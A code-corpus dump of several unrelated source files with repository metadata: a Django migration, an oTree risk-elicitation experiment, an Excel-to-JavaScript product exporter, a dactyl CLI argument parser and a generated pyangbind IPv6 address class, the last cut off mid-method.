# Embedded file name: e:\jenkins\workspace\client_SERENITY\branches\release\SERENITY\eve\common\lib\eveLocalization\__init__.py
from _evelocalization import *
|
[
"victorique.de.blois@asu.edu"
] |
victorique.de.blois@asu.edu
|
85349b427bd1ddd389ed5a26358d73ea6ac2bbe1
|
535f2c4632a0c228b4de75f796c9ecead38a1981
|
/post/migrations/0006_rename_action_post_active.py
|
8257b6648e8c419ea54d9ab401d8069c2e16b207
|
[] |
no_license
|
XavierLarrea/django-multi-language-blog
|
d0b54a16a34604c8d4fe65c7472d32dc05a6df1d
|
af9f53a439d979aeddeb316a55f132c8efb32631
|
refs/heads/main
| 2023-07-15T20:04:44.388310
| 2021-08-24T23:33:33
| 2021-08-24T23:33:33
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 355
|
py
|
# Generated by Django 3.2.4 on 2021-06-23 09:05
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('post', '0005_alter_post_slug'),
]
operations = [
migrations.RenameField(
model_name='post',
old_name='action',
new_name='active',
),
]
|
[
"mohamedemad1891@gmail.com"
] |
mohamedemad1891@gmail.com
|
3122c5bca375e6b689e28626fa6ed0dc01866f47
|
cc0433023de4c8300770e5a645e204781c299a90
|
/models.py
|
53abe067a7c5887ebfb4cd0ab84d8fbc6555edb8
|
[] |
no_license
|
ahmedsalimnuhu/Risk-preferences-python-codes
|
5e47783db09de415ffa64c546d33a864567ad169
|
eee933ffffc30d8770bd8e47874fbb35be395d54
|
refs/heads/master
| 2022-11-27T22:05:13.524564
| 2020-08-07T17:20:30
| 2020-08-07T17:20:30
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,792
|
py
|
from otree.api import (
models, widgets, BaseConstants, BaseSubsession, BaseGroup, BasePlayer
#Currency as c, currency_range
)
from risk.config import *
import random
from random import randrange
author = 'Salim Nuhu'
doc = """
Certainty equivalent method as proposed by Cohen et al. (1987) and Abdellaoui et al. (2011),
as well as variations thereof suggested by Bruner (2009) and Gächter et al. (2010).
"""
# ******************************************************************************************************************** #
# *** CLASS SUBSESSION
# ******************************************************************************************************************** #
class Subsession(BaseSubsession):
# initiate lists before session starts in round 1
# ----------------------------------------------------------------------------------------------------------------
def creating_session(self):
if self.round_number == Constants.num_rounds:
#self.session.config['REAL_WORLD_CURRENCY_CODE'] = Constants.KSH
vchoice = random.choice(Constants.coin)
self.session.vars['vchoice'] = vchoice
if self.round_number == 1:
n = Constants.num_choices
for p in self.get_players():
# create list of lottery indices
# ----------------------------------------------------------------------------------------------------
indices = [j for j in range(1, n + 1)]
# create list corresponding to form_field variables including all choices
# ----------------------------------------------------------------------------------------------------
form_fields = ['choice_' + str(k) for k in indices]
# create list of probabilities
# ----------------------------------------------------------------------------------------------------
if Constants.variation == 'probability':
probabilities = [Constants.probability + (k - 1) * Constants.step_size for k in indices]
else:
probabilities = [Constants.probability for k in indices]
# create list of high lottery payoffs
# ----------------------------------------------------------------------------------------------------
if Constants.variation == 'lottery_hi':
lottery_hi = [(Constants.lottery_hi + (k - 1) * Constants.step_size) for k in indices]
else:
lottery_hi = [(Constants.lottery_hi) for k in indices]
# create list of low lottery payoffs
# ----------------------------------------------------------------------------------------------------
if Constants.variation == 'lottery_lo':
lottery_lo = [(Constants.lottery_lo - (k - 1) * Constants.step_size) for k in indices]
else:
lottery_lo = [(Constants.lottery_lo) for k in indices]
# create list of sure payoffs
# ----------------------------------------------------------------------------------------------------
if Constants.variation == 'sure_payoff':
sure_payoffs = [(Constants.sure_payoff + (k - 1) * Constants.step_size) for k in indices]
else:
sure_payoffs = [(Constants.sure_payoff) for k in indices]
# create list of choices
# ----------------------------------------------------------------------------------------------------
p.participant.vars['cem_choices'] = list(
zip(
indices,
form_fields,
probabilities,
lottery_hi,
lottery_lo,
sure_payoffs
)
)
# randomly determine index/choice of binary decision to pay
# ----------------------------------------------------------------------------------------------------
p.participant.vars['cem_index_to_pay'] = random.choice(indices)
p.participant.vars['cem_choice_to_pay'] = 'choice_' + str(p.participant.vars['cem_index_to_pay'])
# randomize order of lotteries if <random_order = True>
# ----------------------------------------------------------------------------------------------------
if Constants.random_order:
random.shuffle(p.participant.vars['cem_choices'])
# initiate list for choices made
# ----------------------------------------------------------------------------------------------------
p.participant.vars['cem_choices_made'] = [None for j in range(1, n + 1)]
# generate random switching point for PlayerBot in tests.py
# --------------------------------------------------------------------------------------------------------
for participant in self.session.get_participants():
participant.vars['cem-bot_switching_point'] = random.randint(1, n)
# ******************************************************************************************************************** #
# *** CLASS GROUP
# ******************************************************************************************************************** #
class Group(BaseGroup):
pass
# ******************************************************************************************************************** #
# *** CLASS PLAYER
# ******************************************************************************************************************** #
class Player(BasePlayer):
# add model fields to class player
# ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
for j in range(1, Constants.num_choices + 1):
locals()['choice_' + str(j)] = models.StringField()
del j
random_draw = models.IntegerField()
choice_to_pay = models.StringField()
option_to_pay = models.StringField()
inconsistent = models.IntegerField()
switching_row = models.IntegerField()
name = models.StringField(
label='''
Name''',
)
company = models.StringField(
label='''
Name of the firm you represent''',
)
position = models.StringField(
label='''
Your role in the company''',
)
age = models.IntegerField(
label='Age',
min=18, max=125)
gender = models.StringField(
choices=['Male', 'Female'],
label='Gender',
widget=widgets.RadioSelect
)
educ = models.StringField(
choices=['Not Gone to School', 'Primary', 'Secondary',
'Diploma(Including Nursing, Vocational and Teaching Diploma)',
'University Degree', 'Postgraduate Degree', 'Doctorate'],
label=''' What is the highest level of education you have completed? ''',
widget=widgets.RadioSelect
)
county = models.StringField(
label='''
In which county is your company/organization located
'''
)
product = models.StringField(
label='''
What is your organization's main product (focus area if NGO)?
'''
)
# set player's payoff
# ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def set_payoffs(self):
# random draw to determine whether to pay the "high" or "low" outcome of the randomly picked lottery
# ------------------------------------------------------------------------------------------------------------
        self.random_draw = randrange(1, 101)  # uniform draw on 1..100 to match percent probabilities
# set <choice_to_pay> to participant.var['choice_to_pay'] determined creating_session
# ------------------------------------------------------------------------------------------------------------
self.choice_to_pay = self.participant.vars['cem_choice_to_pay']
# determine whether the lottery (option "A") or the sure payoff (option "B") was chosen
# ------------------------------------------------------------------------------------------------------------
self.option_to_pay = getattr(self, self.choice_to_pay)
# set player's payoff
# ------------------------------------------------------------------------------------------------------------
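        # 'cem_choices' may have been shuffled, so first recover the list
        # position of the drawn lottery index; each row is a tuple of
        # (index, form_field, probability, lottery_hi, lottery_lo, sure_payoff)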
indices = [list(t) for t in zip(*self.participant.vars['cem_choices'])][0]
index_to_pay = indices.index(self.participant.vars['cem_index_to_pay']) + 1
choice_to_pay = self.participant.vars['cem_choices'][index_to_pay - 1]
if self.option_to_pay == 'A':
if self.random_draw <= choice_to_pay[2]:
self.payoff = Constants.endowment + choice_to_pay[3]
else:
self.payoff = Constants.endowment + choice_to_pay[4]
else:
self.payoff = Constants.endowment + choice_to_pay[5]
# set payoff as global variable
# ------------------------------------------------------------------------------------------------------------
self.participant.vars['cem_payoff'] = self.payoff
# determine consistency
# ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def set_consistency(self):
n = Constants.num_choices
# replace A's by 1's and B's by 0's
self.participant.vars['cem_choices_made'] = [
1 if j == 'A' else 0 for j in self.participant.vars['cem_choices_made']
]
# check for multiple switching behavior
for j in range(1, n):
choices = self.participant.vars['cem_choices_made']
self.inconsistent = 1 if choices[j] > choices[j - 1] else 0
if self.inconsistent == 1:
break
# determine switching row
# ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def set_switching_row(self):
# set switching point to row number of first 'B' choice
if self.inconsistent == 0:
self.switching_row = sum(self.participant.vars['cem_choices_made']) + 1
|
[
"noreply@github.com"
] |
ahmedsalimnuhu.noreply@github.com
|
31c8a9268102ced0ab5dc34591ab3b96c09dec85
|
9b2150c5d7b71fd67bb4267e8fe93ac98658df77
|
/jsWriteFile.py
|
f791f3d4034c34c767c9f11c330e8c12db368239
|
[] |
no_license
|
rupkumar1996/STL-Code
|
10afb1e7835e64c56354dc6f47f1b1b282fe9647
|
22236443df305ef9c4868ed363b49b91376600fc
|
refs/heads/master
| 2021-02-09T15:52:26.290467
| 2020-03-02T06:58:28
| 2020-03-02T06:58:28
| 244,299,690
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,671
|
py
|
import xlrd
from string import Template
import os
import shutil
def jsWriter(folder_name):
if os.path.exists(folder_name +'/js'):
shutil.rmtree(folder_name +'/js')
shutil.copytree(os.getcwd() + '/js', folder_name+'/js')
with open(folder_name+'/js/externalFile.js', "a") as fp:
wb = xlrd.open_workbook(folder_name+'/scraped_data.xlsx')
sheet = wb.sheet_by_index(0)
nrows = sheet.nrows
# print(nrows)
for j in range(nrows-1):
fp.writelines("\n{")
fp.writelines(Template("id: \"$i\",\n").substitute(i=j+1))
fp.writelines(Template("image: \"images/$k.webp\",\n").substitute(k=j+1))
fp.writelines(Template("price: \"Rs. $price\",\n").substitute(price=int(float((str(sheet.cell_value(j+1,1)).strip()).replace(",", "")))))
fp.writelines(Template("name: \"$name\",\n").substitute(name=sheet.cell_value(j+1,0 )))
fp.writelines(Template("merchantName: \"$merchant\",\n").substitute(merchant=sheet.cell_value(j+1,5)))
fp.writelines(Template("viewproductUrl: \"$url\"\n").substitute(url=sheet.cell_value(j+1,3)))
fp.writelines("},")
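    # reopen in binary mode to strip the trailing comma written after the last
    # product object, then append the closing ']' of the JSON-like array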
with open(folder_name+'/js/externalFile.js', 'rb+') as f:
f.seek(0,2)
size=f.tell()
f.truncate(size-1)
with open(folder_name+'/js/externalFile.js', "a") as fp:
fp.writelines('\n\n]')
rootdir = 'C:/Users/rupkumar.saha/Desktop/Ama_Files/'
for folders in os.listdir(rootdir):
if folders == '.DS_Store':
continue
print(folders)
jsWriter(rootdir + folders)
|
[
"ayushi.agarwal@walmartlabs.com"
] |
ayushi.agarwal@walmartlabs.com
|
f832bcd4c625f055315cb9acc7cff3c3d1d5f3f1
|
adffea7027bdd1c5733b3bd9361c2d32942cddbb
|
/blog/urls.py
|
e47c165886ad0490f944da1a9b8e6364db9b83a5
|
[] |
no_license
|
OnlyAdel/adel_portfolio
|
a1cd83f9195bb1f430fe4f2bc8ea65b7b0e49bd2
|
1ebfbf6ce3719bba303da5fab557e756b2d3a4e3
|
refs/heads/main
| 2023-05-05T12:50:47.819869
| 2021-05-19T13:45:04
| 2021-05-19T13:45:04
| 368,840,896
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 193
|
py
|
from django.urls import path
from . import views
app_name = 'blog'
urlpatterns = [
path('', views.all_blogs, name='all_blogs'),
path('<int:blog_id>/', views.detail, name='detail'),
]
|
[
"m.adel.kadi@pm.me"
] |
m.adel.kadi@pm.me
|
db704e6bc73086f4b513638afc26cfca69671862
|
4618c0152d45bcb5f54e298661a1479c643353f4
|
/pyengine/api/v1/GetProductDetail.py
|
d47126c2ec1ccde23882d215ccd30c526680ccaf
|
[] |
no_license
|
pyengine/catalog
|
07312fb7606f6ff0b7e55359740af4a4e5d509f4
|
2403563c1f93d988466a12b870ce25475b0d1d92
|
refs/heads/master
| 2021-01-10T04:47:24.200088
| 2016-04-13T15:04:47
| 2016-04-13T15:04:47
| 55,772,134
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 454
|
py
|
from pyengine.lib.error import *
from pyengine.lib.command import Command
class GetProductDetail(Command):
# Request Parameter Info
req_params = {
'uuid': ('r', 'str'),
}
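    # ('r', 'str') presumably encodes (requirement flag, expected type), i.e.
    # 'uuid' is a required string parameter.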
def __init__(self, api_request):
super(self.__class__, self).__init__(api_request)
def execute(self):
mgr = self.locator.getManager('ProductManager')
info = mgr.getProductDetail(self.params)
return info.result()
|
[
"choonho.son@gmail.com"
] |
choonho.son@gmail.com
|
177f201e1b4fa621de91bd02b007ad83469d8818
|
1225f52c16125f0f5c0ef1766b5aa24d47c6e908
|
/crm/contacts/admin.py
|
25b45e4e6ae88539a3fc42f8f66739dde74bb131
|
[] |
no_license
|
Edvoy/cw_crm
|
4853eef48dd62645896c5f95603d9bd9e847b69a
|
c4449327a00b871f2275176c9ffe547dd60668ec
|
refs/heads/main
| 2023-05-02T06:34:01.245856
| 2021-05-27T11:52:35
| 2021-05-27T11:52:35
| 366,396,092
| 0
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 350
|
py
|
from django.contrib import admin
from .models import Contact
class ContactAdmin(admin.ModelAdmin):
fields = [
'contact_first_name',
'contact_last_name',
'contact_company',
'contact_job',
'contact_email',
'contact_phone',
'contact_notes',
]
admin.site.register(Contact, ContactAdmin)
|
[
"edouard.voyer@gmail.com"
] |
edouard.voyer@gmail.com
|
ab267947be157efba29c3961874240e4fe1525e0
|
fa60536fbc7c0d8a2a8f08f0a5b6351c77d08054
|
/3]. Competitive Programming/03]. HackerRank/1]. Practice/12]. 10 Days of Statistics/Day_6.py
|
e41bfd0b077838b4959c81b40f61a88e9381c66c
|
[
"MIT"
] |
permissive
|
poojitha2002/The-Complete-FAANG-Preparation
|
15cad1f9fb0371d15acc0fb541a79593e0605c4c
|
7910c846252d3f1a66f92af3b7d9fb9ad1f86999
|
refs/heads/master
| 2023-07-17T20:24:19.161348
| 2021-08-28T11:39:48
| 2021-08-28T11:39:48
| 400,784,346
| 5
| 2
|
MIT
| 2021-08-28T12:14:35
| 2021-08-28T12:14:34
| null |
UTF-8
|
Python
| false
| false
| 762
|
py
|
# 1st Solution------------------------------------------------
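# By the Central Limit Theorem, the sum of n i.i.d. draws with mean mu and
# std s is approximately Normal(n*mu, sqrt(n)*s), so P(sum <= x) is the
# normal CDF 0.5*(1 + erf((x - n*mu) / (sqrt(n)*s*sqrt(2)))).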
import math
x, n = int(input()), int(input())
mu, s = float(input()), float(input())
m1 = n*mu
s1 = math.sqrt(n)*s
def cdf(x, m, s):
    z = (x-m)/s
    return 0.5*(1 + math.erf(z/(math.sqrt(2))))
print(round(cdf(x, m1, s1), 4))
# 2nd Solution-------------------------------------------
import math
x, n = 250, 100
s_mean, s_stdev = 2.4, 2.0
stdev = s_stdev * math.sqrt(n)
cdf = 0.5*(1+math.erf((x-s_mean*n)/(stdev * math.sqrt(2))))
print(round(cdf, 4))
# 3rd Solution-----------------------------------------------
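# Reads n, the sample mean, the std, the confidence level (not used in the
# formula), and the z-score, then prints the interval mean -/+ z*std/sqrt(n).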
from math import sqrt
a, b, c, d, e = int(input()), int(input()), int(input()), float(input()), float(input())
print(round(b - (c/sqrt(a))*e, 2))
print(round(b + (c/sqrt(a))*e, 2))
|
[
"akashsingh27101998@gmai.com"
] |
akashsingh27101998@gmai.com
|
d7aab49e18b51fe7d949878d6cb8b8ceb6f8d356
|
9f6b4712faf640cb7cea29581db466fadd7d8323
|
/final/general.py
|
6c42ecac78ddc4cb6e499fa53973072b69f44b83
|
[] |
no_license
|
daniidega/proyecto_computacionGrafica
|
63d0975809de953643c03b030dbb72ca3ae2c86c
|
cf7fede2de3ff04c607ebffc0fbe89a9be71c0c9
|
refs/heads/master
| 2021-01-12T08:29:19.043186
| 2016-12-16T00:23:16
| 2016-12-16T00:23:16
| 76,595,709
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 114
|
py
|
import pygame
ANCHO=800
ALTO=500
BLANCO=(255,255,255)
NEGRO=(0,0,0)
ROJO=(255,0,0)
VERDE=(0,255,0)
AZUL=(0,0,255)
|
[
"danii.75@utp.edu.co"
] |
danii.75@utp.edu.co
|
fefbb2d228c834bce7c47910a3f7c291471595d6
|
1533bc7d9fad75236e9baffb1da9df3af66d2b06
|
/dactyl/cli.py
|
57d0c7c615f7ceb3192b2e32627f6730e9116a25
|
[
"MIT"
] |
permissive
|
MarcelRaschke/dactyl
|
e3533c04cc4493f91a3aa523cb745ab27781e2d4
|
c93a6e455ec904685b7992c52967401f5559d7d2
|
refs/heads/master
| 2023-04-07T10:51:22.547757
| 2019-10-18T04:51:57
| 2019-10-18T04:51:57
| 234,778,195
| 1
| 1
|
MIT
| 2023-04-03T23:39:18
| 2020-01-18T18:26:22
| null |
UTF-8
|
Python
| false
| false
| 6,481
|
py
|
#!/usr/bin/env python3
from dactyl.common import *
import argparse
class DactylCLIParser:
UTIL_BUILD = "Generate static site from markdown and templates."
UTIL_LINKS = "Check files in this repository for broken links."
UTIL_STYLE = "Check content files for style issues."
def __init__(self, utility):
"""Specify commandline usage and parse arguments"""
parser = argparse.ArgumentParser(description=utility)
noisiness = parser.add_mutually_exclusive_group(required=False)
noisiness.add_argument("--quiet", "-q", action="store_true",
help="Suppress status messages")
noisiness.add_argument("--debug", action="store_true",
help="Print debug-level log messages")
parser.add_argument("--config", "-c", type=str,
help="Specify path to an alternate config file.")
parser.add_argument("--version", "-v", action="store_true",
help="Print version information and exit.")
parser.add_argument("--bypass_errors", "-b", action="store_true",
help="Continue if recoverable errors occur")
if utility in (self.UTIL_BUILD, self.UTIL_STYLE):
parser.add_argument("--target", "-t", type=str,
help="Use the specified target (from the config file).")
if utility == self.UTIL_BUILD:
build_mode = parser.add_mutually_exclusive_group(required=False)
build_mode.add_argument("--pdf", nargs="?", type=str,
const=DEFAULT_PDF_FILE, default=NO_PDF,
help="Output a PDF to this file. Requires Prince.")
build_mode.add_argument("--md", action="store_true",
help="Output markdown only")
build_mode.add_argument("--html", action="store_true", default=True,
help="Output HTML files (the default)")
build_mode.add_argument("--es", action="store_true",
help="Output JSON for ElasticSearch upload")
# HTML is the default mode
static_files = parser.add_mutually_exclusive_group(required=False)
static_files.add_argument("--copy_static", "-s", action="store_true",
help="Copy all static files to the out dir",
default=False)
static_files.add_argument("--no_static", "-S", action="store_true",
help="Don't copy any static files to the out dir",
default=False)
static_files.add_argument("--template_static", "-T", action="store_true",
help="Copy only templates' static files to the out dir",
default=False)
static_files.add_argument("--content_static", "-C", action="store_true",
help="Copy only the content's static files to the out dir",
default=False)
parser.add_argument("--es_upload", nargs="?", type=str,
const=DEFAULT_ES_URL, default=NO_ES_UP,
help="Upload documents to ElasticSearch cluster "+
"at this URL (http://localhost:9200 by default). "+
"Ignored when making PDFs.")
parser.add_argument("--leave_temp_files", action="store_true",
help="Leave temp files in place (for debugging or "+
"manual PDF generation). Ignored when using --watch",
default=False)
parser.add_argument("--list_targets_only", "-l", action="store_true",
help="Don't build anything, just display list of "+
"known targets from the config file.")
parser.add_argument("--only", type=str, help=".md or .html filename of a "+
"single page in the config to build alone.")
parser.add_argument("--out_dir", "-o", type=str,
help="Output to this folder (overrides config file)")
parser.add_argument("--pages", type=str, help="Markdown file(s) to build "+\
"that aren't described in the config.", nargs="+")
parser.add_argument("--openapi", type=str, help="OpenAPI spec file "+
"to generate docs from.")
parser.add_argument("--no_cover", "-n", action="store_true",
help="Don't automatically add a cover / index file.")
parser.add_argument("--skip_preprocessor", action="store_true", default=False,
help="Don't pre-process Jinja syntax in markdown files")
parser.add_argument("--template_strict_undefined", action="store_true",
help="Raise an error on undefined variables in "+
"template syntax.")
parser.add_argument("--pp_strict_undefined", action="store_true",
help="Raise an error on undefined variables in "+
"preprocessor syntax.")
parser.add_argument("--title", type=str, help="Override target display "+\
"name. Useful when passing multiple args to --pages.")
parser.add_argument("--vars", type=str, help="A YAML or JSON file with vars "+
"to add to the target so the preprocessor and "+
"templates can reference them.")
parser.add_argument("--watch", "-w", action="store_true",
help="Watch for changes and re-generate output. "+\
"This runs until force-quit.")
elif utility == self.UTIL_LINKS:
parser.add_argument("-o", "--offline", action="store_true",
help="Check local anchors only")
parser.add_argument("-s", "--strict", action="store_true",
help="Exit with error even on known problems")
parser.add_argument("-n", "--no_final_retry", action="store_true",
help="Don't wait and retry failed remote links at the end.")
self.cli_args = parser.parse_args()
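# Typical use (sketch): build the parser for one utility and read the parsed
# options, e.g.
#   cli = DactylCLIParser(DactylCLIParser.UTIL_BUILD)
#   if cli.cli_args.watch:
#       ...  # rebuild on changes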
|
[
"mduo13@gmail.com"
] |
mduo13@gmail.com
|
1f8eb3d5d29c1b02e07895acc3f612ee67858941
|
51f887286aa3bd2c3dbe4c616ad306ce08976441
|
/pybind/slxos/v17s_1_02/routing_system/interface/loopback/ipv6/ipv6_config/address/ipv6_address/__init__.py
|
0eecc2d4add5bb3dd32255bc3b601767a6121cd0
|
[
"Apache-2.0"
] |
permissive
|
b2220333/pybind
|
a8c06460fd66a97a78c243bf144488eb88d7732a
|
44c467e71b2b425be63867aba6e6fa28b2cfe7fb
|
refs/heads/master
| 2020-03-18T09:09:29.574226
| 2018-04-03T20:09:50
| 2018-04-03T20:09:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 14,516
|
py
|
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
class ipv6_address(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-common-def - based on the path /routing-system/interface/loopback/ipv6/ipv6-config/address/ipv6-address. Each member element of
the container is represented as a class variable - with a specific
YANG type.
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__address','__eui64','__anycast',)
_yang_name = 'ipv6-address'
_rest_name = 'ipv6-address'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__eui64 = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="eui64", rest_name="eui-64", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure ipv6 address with an automatically computed EUI-64 interface Id', u'alt-name': u'eui-64'}}, namespace='urn:brocade.com:mgmt:brocade-ipv6-config', defining_module='brocade-ipv6-config', yang_type='empty', is_config=True)
self.__anycast = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="anycast", rest_name="anycast", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure ipv6 address as anycast'}}, namespace='urn:brocade.com:mgmt:brocade-ipv6-config', defining_module='brocade-ipv6-config', yang_type='empty', is_config=True)
self.__address = YANGDynClass(base=[RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(/(([0-9])|([0-9]{2})|(1[0-1][0-9])|(12[0-8])))'}),RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(/(([0-9])|([0-9]{2})|(1[0-1][0-9])|(12[0-8])))'}),], is_leaf=True, yang_name="address", rest_name="address", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'A:B::C:D/LEN;; IPv6 prefix format: xxxx:xxxx/ml, xxxx:xxxx::/ml, xxxx::xx/128'}}, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-ipv6-config', defining_module='brocade-ipv6-config', yang_type='union', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'routing-system', u'interface', u'loopback', u'ipv6', u'ipv6-config', u'address', u'ipv6-address']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'interface', u'Loopback', u'ipv6', u'address', u'ipv6-address']
def _get_address(self):
"""
Getter method for address, mapped from YANG variable /routing_system/interface/loopback/ipv6/ipv6_config/address/ipv6_address/address (union)
"""
return self.__address
def _set_address(self, v, load=False):
"""
Setter method for address, mapped from YANG variable /routing_system/interface/loopback/ipv6/ipv6_config/address/ipv6_address/address (union)
If this variable is read-only (config: false) in the
source YANG file, then _set_address is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_address() directly.
"""
parent = getattr(self, "_parent", None)
if parent is not None and load is False:
raise AttributeError("Cannot set keys directly when" +
" within an instantiated list")
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=[RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(/(([0-9])|([0-9]{2})|(1[0-1][0-9])|(12[0-8])))'}),RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(/(([0-9])|([0-9]{2})|(1[0-1][0-9])|(12[0-8])))'}),], is_leaf=True, yang_name="address", rest_name="address", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'A:B::C:D/LEN;; IPv6 prefix format: xxxx:xxxx/ml, xxxx:xxxx::/ml, xxxx::xx/128'}}, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-ipv6-config', defining_module='brocade-ipv6-config', yang_type='union', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """address must be of a type compatible with union""",
'defined-type': "brocade-ipv6-config:union",
'generated-type': """YANGDynClass(base=[RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(/(([0-9])|([0-9]{2})|(1[0-1][0-9])|(12[0-8])))'}),RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(/(([0-9])|([0-9]{2})|(1[0-1][0-9])|(12[0-8])))'}),], is_leaf=True, yang_name="address", rest_name="address", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'A:B::C:D/LEN;; IPv6 prefix format: xxxx:xxxx/ml, xxxx:xxxx::/ml, xxxx::xx/128'}}, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-ipv6-config', defining_module='brocade-ipv6-config', yang_type='union', is_config=True)""",
})
self.__address = t
if hasattr(self, '_set'):
self._set()
def _unset_address(self):
